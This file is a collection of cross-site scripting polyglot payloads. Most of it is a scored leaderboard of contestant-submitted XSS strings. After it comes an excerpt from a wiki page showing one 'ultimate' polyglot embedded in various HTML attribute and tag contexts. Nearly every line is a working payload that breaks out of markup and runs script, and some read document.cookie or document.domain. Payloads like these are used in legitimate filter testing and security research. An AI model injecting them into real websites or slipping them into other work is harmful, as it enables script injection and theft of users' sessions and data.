<!-- http://polyglot.innerht.ml/ -->

0	crlf	20	141
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
1	europa	20	143
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
2	EdOverflow	20	143
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
3	h1/ragnar	20	143
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
4	A. Korzhynskyi	20	143
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
5	Somdev Sangwan	20	144
javascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
6	@trichimtrich	20	144
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;i<frame */ onload=alert()//</script>
7	tsug0d	20	145
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*&lt;i<frame/*/ onload=alert()//</Script>
8	Benoit Esnard	20	146
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript>&lt;<script/>/<frame */; onload=alert()//&lt</script>`
9	@rawsec	20	146	
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript>&lt;<script/>/<frame */; onload=alert()//&lt</script>`
10	@RakeshMane10	20	149	
javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame &lt;svg"///*/ onload=alert()//</script>
11	@TeamBounters	20	149
javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame &lt;svg"///*/ onload=alert()//</script>
12	bounter	20	150
javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/&lt;svg/*/onload= alert()//</script>
13	bayo	20	150
javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/&lt;svg */ onload=alert()//</script>
14	n1	20	150
javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*&lt;svg <frame */ onload=alert()//</script>
15	@y0n3uchy	20	150
javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame &lt;svg */ onload=alert()//</script>
16	Meerkat	20	152
javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*&lt;svg <frame onload=/**/alert()//</script>
17	qd (@qd0an)	20	154
javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>-->&lt;<script>alert()&lt;</script><frame/*/ onload=alert()//>
18	i	20	155
javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//&lt;svg <frame */onload= alert()//</script>
19	yusuke	20	155
javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//&lt;svg <frame */onload= alert()//</script>
20	@m4th3c	20	156
javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()-->&lt;<svg/*/ onload=alert()//>
21	concavang	20	156
javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//-->&lt;<sVg/onload=alert``>
22	kurgm	20	156
javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]&lt;<script>///<frame */ onload=alert()//&lt;</script>
23	@ommadawn46	20	157
javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()>&lt;<svg/onload= /**/alert()//>
24	Darwin (R0CREW)	20	158
javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>&lt;<script> /**/alert()//&lt;</script><frame onload=alert()>
25	xxx	20	159
javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script>&lt;<script>/*` /*<frame src=javascript:/**/alert()//>&lt;</script>
26	koaidien	20	161
javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script>&lt;svg/<frame/onload=alert()>
27	@giutro	20	164
javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``>&lt;<svg/onload=alert()>
28	c	20	167
javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*&lt;svg onload=' /**/-alert()//'&gt;`
29	yarbabin	20	169
javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script>&lt;<svg/onload= alert()//>
30	test	20	170
javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()>&lt;<script>alert()&lt;</script>
31	lazarus	20	172
javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script>&lt;<svg onload=alert()>
32	@KacperSzurek	20	173
javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()-->&lt;<svg/onload=alert()>
33	Corb3nik	20	175
javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script -->&lt;<script>alert()&lt;</script>\ /**/alert()//
34	DrStache	20	177
javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>-->&lt;<svg/onload=alert()><frame/src=javascript:alert()>
35	2test	20	179
javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//&lt;svg onload= alert()//</script>
36	ttt	20	181
javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg &lt;svg onload=alert()> alert()//
37	hoangdoan	20	182
javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame &lt;svg onload=alert()><script>alert()</script>
38	n0n4me	20	182
javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>-->&lt;<svg onload=alert()><frame src=javascript:alert()>
39	@hayakudesu	20	188
javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="&lt;svg/onload=alert()>"><frame/onload=alert()>*/ alert()//
40	superevr	20	193
javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*&lt;svg onload=alert()&gt;*/ alert()//</script>
41	KuroNeko	20	201
jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//&lt;svg/onload=alert()&gt;<frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//>
42	zblee	20	201
javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>-->&lt;<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()>
43	BadSpell	20	204
javascript:alert()//\ /*&lt;svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()//
44	yappare	20	204
javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() &lt;img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script>
45	1024bita	20	209
javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script>&lt;<svg onload=alert()>&gt;
46	h1_sp1d3r	20	216
javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()>&lt;svg/onload=alert(1)&gt; alert()//
47	dcua	20	232
javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()>&lt;svg/onload=alert()&gt; alert(1)//
48	ImGroot	20	234
javascript:alert()//<frame/src=javascript:alert()>&lt;svg/onload=alert()&gt`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//*
49	kaibro	20	249
javascript:alert()//</title></style></textarea></noscript></template></noembed>&lt;script&gt;alert()&lt;/script&gt-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/*
50	Test	20	287	
javascript:alert();//&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
51	flint	20	314	
javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//&lt;img src onerror&equals;alert&lpar;&rpar;&gt;
52	ppp	20	391
javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)>&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt; alert(1)//
53	k9	19	143
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;<frame */ onload=alert()//</script>
54	xrekkusu	19	165
javascript:/*\"+/*&lt;script>//<script>//`//"//'//*/ alert()//&lt;/script></script></textarea></noscript></noembed></style></template></title>--><svg/onload=alert()>
55	h45h5h0t	19	179
javascript:alert();//&lt;svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();//</div/</title/</textarea/</style/</noscript/</noembed/</script/--!></template><script>alert()()</script>
56	@h45h5h0t	19	179
javascript:alert();//&lt;svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();//</div/</title/</textarea/</style/</noscript/</noembed/</script/--!></template><script>alert()()</script>
57	titi	19	211
javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></noembed></template></select>&lt;svg/oNloAd=alert()&gt;<FRAME onload=alert()></script>\";alert()//<svg/oNloAd=alert()>
58	maxi	18	156
jaVaScript:alert()//<sCriPt>/*`/*'/*"/**/(alert())//</stYle/</titLe/</teXtarEa/</noEmBed/</nOscRipt/</scRipt/--!></teMpLate><sVg/oNloAd=alert()>\" alert()//
59	nobody	18	198
javascript:alert();//";/*';/*`;/**/ alert(1);//</noscript></style></title></textarea></noembed></template>--></script><frame src="javascript:alert()"><svg onload='alert(1)'><script>alert();</script>
60	johndoe1492	18	201
javascript:alert()`-alert()`//'-alert()-'"-alert()-"<FRAME SRC=javascript:alert()//</textarea></title>--></style></script></template></noscript>*/alert()/*</noembed><script>alert()</script>\"-alert()//
61	Swk	18	204
javascript:alert()//"+alert()//'+alert()//`+alert()//</title></textarea></noscript></noembed></style></template></select></script>-->'>"><frame src=javascript:alert(1)><svg onload=alert()><!--*/ alert()//
62	maksimkhazov	18	218	
javascript:alert()//</noscript></noembed></template>jaVasCript:/*`/*\`/*'/*"/**/(/* */alert())//</style/</titLe/</textarea/</scRipt/--><script>alert()</script>&lt;svg/onload=alert()&gt;<frame src="javascript:alert(1)">
63	tet	18	234
javascript:alert()//;alert();//*/;alert()//;';alert();//";alert();//`;alert();//</title></textarea></style></script></noscript></noembed></template><frame src=javascript:alert()></option></select>"'--><svg onload=alert()>\";alert();//
64	Sawa	18	235
"-alert(1)-"'-alert(1)-'\"; alert(1)//&lt;img src=x onerror=alert(1)&gt;*/alert(1)/*${alert(1)}<frame src=javascript:alert(1);></template></noembed></noscript></style></textarea></title><script>alert(1)</script>--><svg onload=alert(1)>
65	aaaa	17	153
";';/*--></title></style></textarea></noscript></noembed></template><script>alert(1)</script><svg/onload='+/\"/+/`/+/onmouseover=1/+/[*/[]/+ alert(1)//'>
66	shinkbr	17	154
javascript:/*'/*\""/*`/**/;alert();//--></title></style></noscript></textarea></noembed></template><frame onload=alert()></script><script>alert()</script>
67	sir1ous	17	191
/*`/*'/*"/*\"/**/(alert() )//<frame src=javascript:alert()></noscript><input type=image src=x onerror=alert()></noembed></template></stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()>
68	zairo	17	195
javascript:alert();//`;alert(1)//-->';alert();//";alert()//><frame src="javascript:alert()"></title></textarea></style></noscript></noembed></template></script>&lt;<script>alert();//&lt;</script>
69	IJustCopyPasted	17	197
<frame src=javascript:alert()>/*`/*'/*"/*\"/**/(alert() )//%d%a</noscript><input type=image src=a onerror=alert()></noembed></template></stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()//>
70	Kuromatae	16	125
/*`/*\"/*'/*"/**/(alert())//--></script></noscript></noembed></template></title></textarea></style>\"<script>alert()</script>
71	webr0ck	16	151
javascript:alert()//`/*"/*'/**/+alert();//--></title></textarea></style></noscript></noembed></template></option></select></script><svg/onload=alert()>
72	yia	16	205
-->jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</title></textarea></iframe></style></noscript></noembed></template></ScRipT></div><ScRiPt>alert()</ScRipT>&lt;sVg/oNloAd=alert()//>
73	mooo	16	217
\";alert(1);//";alert();//';alert();//`;alert();//--></title></textarea></style></noscript></noembed></template></frameset></option></script><img src=0 onerror=alert() />*/alert();//<script>alert()</script>"alert();//
74	sysr00t	15	131
javASCripT:/*\\"/*\"/*'/*`/**/(/**/onClICk=alert``)//</tITLE/</stYLE/</tEXtarEa/--><scrIPT>alert``</SCripT>&lt;<sVg/oNloAd=alert()>
75	awsm	15	156
</noembed></noscript></option></select></template>/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()//>
76	t	15	156
</noembed></noscript></option></select></template>/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()//>
77	seth	15	189
javascript:alert(1);//";alert(1);//';alert(1);//`;alert(1);//</select></iframe></noscript></noembed></title></textarea></style></script>">'>-->%26lt;<img src=x onerror=alert(1)> alert(1);//
78	aaaaaab	15	192
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</title></textarea></style></noscript></noembed></template></option></select>--><script>alert()</script><frame src="javascript:alert(1)">
79	abdilahrf	15	224
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//'"/*–>]]>%>?></object></script></title></style></noembed></template></frameset></option></select></noscript></textarea>!-->><img src=1 onerror=alert(1)>’
80	aaaaaa	14	170
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</title></textarea></style></noscript></noembed></template></frameset></option></select>--><script>alert()</script>
81	testing B	14	281
javascript:alert()//&lt;img src=1 onerror=alert()&gt;"onmouseover=alert() 'onmouseover=alert()</template> </frameset> </noscript></title>--></textarea></style><svg src=1 onerror=alert()></script>'-alert()-';"-alert()-";${alert()}</option></select></noembed><script>alert()</script>
82	x3b	13	141
*/alert()/*'-->"--></title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>alert()</script>
83	Petingo	13	150
'"--></title></textarea></noscript></style></noembed></template></script><svg onload=alert()> /*-/*`/*\`'"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//
84	Abc	13	167
javascript:alert()//</script>--><frame src="javascript:alert()"></option></select></template></noscript></noembed></title></style></textarea>'"><body onload="alert()">
85	byq	12	123
";alert()//--></script></option></select></template></noembed></noscript></style></textarea></title>"'><svg/onload=alert()>
86	o_O	12	143
jaVasCript:/*-/*`/*`/*'/*'"/**/(/**/oNCliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
87	Cider sweet	12	155
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</style/</teXtarEa/</noscript/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
88	lala	12	358
jaVaSCriPt:/*\\x3csvG/oNloAd=alert()\\x3e*/alert()//</stYle/</tiTle/</texTarEa/</scrIpt/--!><sVg//*`/*\"/*'/**/(_=alert())//\\%0a;alert()//'/oNlOad=alert() OncLick=alert()//>;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoKT4K}}--></script></option></select></frameset></template></noembed></noscript></style></textarea></title>';alert();'";alert();"--><svg onload=alert()>
89	loop	11	116
*/";alert();//';alert();//‘;alert();></title></style></textarea></script>--></noscript><script>alert();</script><!--
90	jtjisgod	11	124	
'"--></title></textarea></noscript></noembed></template></frameset></option></select></script></style><svg onload=alert()>'>
91	ww	11	125
</div></title></textarea></style></noscript></noembed></template></option></select>'>">'--></script><script>alert(1)</script>
92	Madsi lingling	11	128
</template></noembed></script></option></select></style></noscript></textarea></title>'"> --> <script> alert ("HI"); </script>
93	L	11	128
--></title></style></textarea></noscript></select></script></noembed></template></frameset></iframe>"//'//><svg/onload=alert(1)>
94	dorans_blade	11	132
"'></script></option></select></template></frameset></noscript></style></textarea></noembed></title>--><img src=x onerror=alert(1)//
95	rekt	11	133
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
96	moe	11	135
"'--><svg onload=alert(123)> </title></textarea></frameset></template></style></script></noembed></noscript><script>alert(123)</script>
97	0	11	138
"'></div></title></textarea></style></noscript></noembed></template></frameset></option></select></script></iframe>--><svg onload=alert()>
98	jesusohjesus	11	138
">-->'>--></title>--></textarea>--></style>--></noscript>--></noembed>--></template>--></frameset>--></script>--><script>alert()</script>
99	Checkium	11	143
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
100	123	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
101	borski	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
102	mvs	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
103	aa	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
104	aaron	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
105	pl0kta	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
106	dehong	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
107	asas	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
108	denis	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
109	Jozo	11	144
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
110	gjbae	11	148
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('')//>\x3e
111	polyglot	11	152
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3epolyglot
112	ja1	11	157
*/" onload=;alert();//';alert();//‘;alert();></title></style></textarea></script>--></noscript></noembed></template></frameset><script>alert();</script><!--
113	003random	11	174	
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(document.domain) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(document.domain)//>\x3e
114	K	10	88
"'--></noscript></noembed></template></title></textarea></style><script>alert()</script>
115	Zajebisty ctf	10	102
"'</title></textarea></style></noscript></template></noembed></select></option>--><svg/onload=alert()>
116	nobody2	10	114
<!--'<!--"<!--`--></style></title></script></textarea></noembed></template></script><body><script>alert()</script>
117	5unKn0wn	10	117
<!--"'--></title></textarea></style></noscript></noembed></template></frameset></option></select><svg onload=alert()>
118	p0uts@	10	143
javascript:/*--></title></style></textarea><ScRipT var x = <ScRipT>alert()</ScRipT></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert()//'>
119	kumagoro	9	95
'"--></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>
120	foo	9	97
"'></title></textarea></noscript></noembed></template></frameset>-->*/ <script>alert(1);</script>
121	dumb	9	112
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
122	Dpster	9	113
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
123	001test	9	547
"><svg onload=alert(1)>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression&#40&#47;&#42;'/-/*&#39;,/**/eval(name)//&#41;;width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"><script>alert(1)</script>#"><img src="x" onerror=prompt(1);>""--!><Svg/OnLoad=(confirm)(/xss/)>
124	x	8	77
</noscript></style></script></textarea></title>"'--><img/src/onerror=alert()>
125	ssssss	8	132
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><body \" x=/*&lt;<svg/*/onload=alert()//>
126	hello	8	138
'--><svg onload=alert()> javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
127		8	157
javascript:/*"/*</template/--></select></stYle></titLe></teXtarEa/></scRipt></noScript></noembed>`/*'/*\"/*<frameset */ ( onload=alert() )//>xxxxxxxxxxxxxxxx
128	a	7	62
">'>--></textarea></title></script><script>alert();//</script>
129	nyaan	7	99
*/alert();';alert();//">'></textarea></script><script>alert()</script> <!--'--><svg onload=alert()>
130	karlito	7	145
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
131	lol	7	145
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
132	testgbgb	6	52
"'>-->*/</noscript></title><script>alert(0)</script>
133	xss	6	114
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
134	kurumi	6	118
"><svg onload=alert()> '--><svg onload=alert()> <script>alert()</script> </textarea><script>alert()</script><textarea>
135	kritixilithos	5	42	
"'--></style></script><svg onload=alert()>
136	dlr	5	52	
'";alert();"></textarea></style><svg onload=alert()>
137	yeeeee	5	339
><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> "><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert ()</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert()</script> <img src="javascript:alert()"> <img src="http://xxx.com/yyy.png" onerror="alert()">
138	@marataziat	4	39
`"*/>'--><script>alert('123');</script>
139	BlackGoat	4	47
*/`"'--><script>alert("XSS");</script><!--'"`/*
140	k	4	77	
'--><svg onload=alert()><script>alert()</script> }'<script>alert()</script>'{
141	tts	3	30	
"'--><svg onload=alert(1)><!--
142	tomnomnom	3	33	
//"//'//--> <svg onload=alert()>
143	marataziat	3	38	
'`"*/ /><script>alert('123');</script>
144	ali	3	60
</noembed></template></script><svg/onload=alert()//</script>
145	sdf	2	24
'--><svg onload=alert()>
146	SamiaM	2	24
'--><svg onload=alert()>
147	loveOverflow	2	24
'"><svg onload=alert(1)>
148	thien	2	24
'--><svg onload=alert()>
149	jji	2	24
'--><svg onload=alert()>
150	21	2	24
'--><svg onload=alert()>
151	Mit	2	24
'--><svg onload=alert()>
152	@SecurityMB	2	25
javascript://\" alert()//
153	1	2	26
><script>alert(1)</script>
154	zorx	2	27
'--><svg onload=alert()>-->
155	newbuy	2	27
'--><svg onload=alert(1) />
156	sumfree	2	28
--> <script>alert()</script>
157	Xm17	2	36
</textarea><script>alert(1)</script>
158	Damian89	2	36
</noscript><script>alert(1)</script>
159	Tagir Z.	2	37
'--><IMG SRC= x onerror=alert("xss")>
160	zajebisty ctf	2	47
</template></frameset><script>alert(1)</script>
161	'"/>><img src=x	2	49
'"/>><img src=x onerror=prompt(document.domain);>
162	001test555	2	143
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar


<!-- https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot -->

HTML contexts covered:
Double-quoted tag attributes:
<input type="text" value="

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

"></input>
Demo: jsbin.com/dopepi

Single-quoted tag attributes:
<input type='text' value='

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'></input>
Demo: jsbin.com/diwedo

Unquoted tag attributes:
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
Demo: jsbin.com/zizuvad

Unquoted tag attributes with HTML-escaped values (may require a click):
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
Demo: jsbin.com/gopavuz (note that the click might not be needed with elements that support the onload event handler.)

href/xlink:href and src attributes with HTML-escaped values:
<a href="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

">click me</a>
Demo: jsbin.com/kixepi

<math xlink:href="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

">click me</math>
Demo: jsbin.com/bezofuw

<iframe src="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

"></iframe>
